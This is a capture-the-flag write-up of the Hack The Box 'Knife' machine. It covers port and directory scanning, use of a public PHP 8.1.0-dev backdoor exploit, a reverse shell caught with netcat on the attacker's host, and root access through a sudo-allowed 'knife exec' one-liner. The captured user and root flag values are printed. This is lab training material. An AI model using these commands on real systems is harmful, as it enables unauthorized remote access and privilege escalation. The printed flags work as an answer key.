Skip to content

HTB Knife done

Knife

OS:

Linux

Technology:

IP Address:

10.129.109.64

Open ports:

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.109.64_nmap 10.129.109.64 ; cat 10.129.109.64_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 19:44 UTC
Nmap scan report for 10.129.109.64
Host is up (0.033s latency).
Not shown: 65476 closed tcp ports (reset), 57 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea

Ffuz: http://10.129.109.64

Rabbit hole
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ ffuf -u http://10.129.109.64/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.109.64_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md                                             

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.109.64/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md 
 :: Output file      : 10.129.109.64_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

index.php               [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 35ms]
:: Progress: [143283/143283] :: Job [1/1] :: 83 req/sec :: Duration: [0:02:10] :: Errors: 0 ::

Nikto: http://10.129.109.64

I found verion of PHP: 8.1.0-dev
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ nikto -host http://10.129.109.64
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.129.109.64
+ Target Hostname:    10.129.109.64
+ Target Port:        80
+ Start Time:         2024-11-16 20:21:51 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/8.1.0-dev.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-11-16 20:27:01 (GMT0) (310 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploit: PHP 8.1.0-dev Backdoor Remote Code Execution

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

Download exploit

──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
Cloning into 'php-8.1.0-dev-backdoor-rce'...
remote: Enumerating objects: 241, done.
remote: Counting objects: 100% (239/239), done.
remote: Compressing objects: 100% (113/113), done.
remote: Total 241 (delta 128), reused 232 (delta 124), pack-reused 2 (from 1)
Receiving objects: 100% (241/241), 1.66 MiB | 6.43 MiB/s, done.
Resolving deltas: 100% (128/128), done.

Run exploit - revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ cd php-8.1.0-dev-backdoor-rce                                          

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Knife/php-8.1.0-dev-backdoor-rce]
└─$ ls    
backdoor_php_8.1.0-dev.py  docs  README.md  revshell_php_8.1.0-dev.py

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Knife/php-8.1.0-dev-backdoor-rce]
└─$ python revshell_php_8.1.0-dev.py                                                
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT>
revshell_php_8.1.0-dev.py: error: the following arguments are required: <target URL>, <attacker IP>, <attacker PORT>

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Knife/php-8.1.0-dev-backdoor-rce]
└─$ python revshell_php_8.1.0-dev.py http://10.129.109.64 10.10.14.117 80
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Knife]
└─$ netcat -lvnp 80                 
listening on [any] 80 ...
connect to [10.10.14.117] from (UNKNOWN) [10.129.109.64] 51078
bash: cannot set terminal process group (891): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$

Read flag: user.txt


james@knife:/$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/james/user.txt
james@knife:/$ 

james@knife:/$ id ; ip a ; cat /home/james/user.txt     
id ; ip a ; cat /home/james/user.txt
uid=1000(james) gid=1000(james) groups=1000(james)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4a:29 brd ff:ff:ff:ff:ff:ff
    inet 10.129.109.64/16 brd 10.129.255.255 scope global dynamic ens160
       valid_lft 2491sec preferred_lft 2491sec
    inet6 dead:beef::250:56ff:fe94:4a29/64 scope global dynamic mngtmpaddr 
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:fe94:4a29/64 scope link 
       valid_lft forever preferred_lft forever
5da789399c373f6a645900b68845cca9
james@knife:/$

Privilege Escalation

Sudo -l

james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Get info about file: /usr/bin/knife

james@knife:/$ ls -la /usr/bin/knife
ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7  2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife
james@knife:/$ ls -la /opt/chef-workstation/bin/knife
ls -la /opt/chef-workstation/bin/knife
-rwxr-xr-x 1 root root 11697 Feb 15  2021 /opt/chef-workstation/bin/knife
james@knife:/$ 

james@knife:/$ file /usr/bin/knife
file /usr/bin/knife
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife
james@knife:/$

GTFOBins - knife

james@knife:/$     sudo knife exec -E 'exec "/bin/sh"'

script /dev/null -c /bin/bash
Script started, file is /dev/null
root@knife:/#

Read flag: root.txt

root@knife:/# cd /root
cd /root
root@knife:~# ls -a
ls -a
.              .bashrc  delete.sh  .rnd              snap
..             .cache   .local     root.txt          .ssh
.bash_history  .chef    .profile   .selected_editor  .viminfo
root@knife:~# 

root@knife:~# id ; ip a ; cat root.txt
id ; ip a ; cat root.txt
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4a:29 brd ff:ff:ff:ff:ff:ff
    inet 10.129.109.64/16 brd 10.129.255.255 scope global dynamic ens160
       valid_lft 3252sec preferred_lft 3252sec
    inet6 dead:beef::250:56ff:fe94:4a29/64 scope global dynamic mngtmpaddr 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:fe94:4a29/64 scope link 
       valid_lft forever preferred_lft forever
fb40f795f0f839c77dc99b6f0485a05c
root@knife:~#

References

[PHP 8.1.0-dev Backdoor Remote Code Execution](https://github.com/flast101/php-8.1.0-dev-backdoor-rce)

[GTFOBins - knife](https://gtfobins.github.io/gtfobins/knife/)

Lessons Learned

Tags